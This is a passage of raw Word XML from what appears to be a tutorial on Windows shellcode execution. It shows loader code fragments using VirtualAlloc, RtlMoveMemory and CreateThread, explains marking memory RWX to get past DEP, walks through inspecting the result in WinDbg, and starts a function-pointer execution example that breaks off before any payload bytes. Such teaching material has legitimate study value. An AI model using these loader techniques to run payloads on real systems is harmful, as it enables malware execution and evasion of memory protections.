        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CreateThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LPTHREAD_START_ROUTINE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>addressPointer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// Sleep for a second to wait for the thread</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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">As it will be shown in the following screenshots, when compiling and executing the above code, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> will be executed from the heap, which is by default protected by the system wide Data Execution Prevention (DEP) policy</w:t>
      </w:r>
      <w:r w:rsidR="006B5BC7" w:rsidRPr="00F07469">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">For DEP enabled processes this would prevent code execution in this memory region. To overcome this burden we ask the system to mark the required memory region as RWX. If you have never set up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinDbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> before, refer to the following screenshot to get an idea of how to point </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinDbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> to your source code, list all loaded modules, set a b</w:t>
      </w:r>
      <w:r w:rsidR="006B5BC7" w:rsidRPr="00F07469">
        <w:t xml:space="preserve">reak point and run your program. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">After entering “g” in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinDbg’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> command line the program will break into the main function of your executable. If you then step through your code to the point after </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>RtlMoveMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t> is called, you will face somethi</w:t>
      </w:r>
      <w:r w:rsidR="006B5BC7" w:rsidRPr="00F07469">
        <w:t xml:space="preserve">ng like the following in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B5BC7" w:rsidRPr="00F07469">
        <w:t>WinDbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B5BC7" w:rsidRPr="00F07469">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t>As indicated by the violet line we are currently right after the call to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>RtlMoveMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>. If we refer to the code above, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>RtlMoveMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t> takes a Pointer from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> to write our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> to the given location. As the pointer returned from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t> is the first argument to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>RtlMoveMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">, it will be pushed on stack last (within register </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>) before calling the function, as function parameters get pushed on the stack in reverse order. If we would have stopped right before the call to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>RtlMoveMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> register would show the address location to be ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>0x420000’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">, which in the above screenshot has been placed into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> register after the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> call.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5BC7" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>Inspecting the memory location at address 0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>420000</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> in the screenshot above, shows that our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> has been placed at this address.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> Furthermore, note that the stack base address (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>) is shown as </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>0x5afa34</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t> and the stack pointer (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> – the top address of the stack) is pointing to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>0x5af938</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">, spanning the stack across the addresses in this range. As the memory location of </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> is not within the stack range we can safely conclude it has been placed on the heap instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5BC7" w:rsidRPr="00F07469" w:rsidRDefault="006B5BC7" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Function Pointer Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">In contrast to the vanilla approach above, another technique to execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> within memory is by the use of function pointers, as shown in the code snippet below:</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>windows.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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un"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
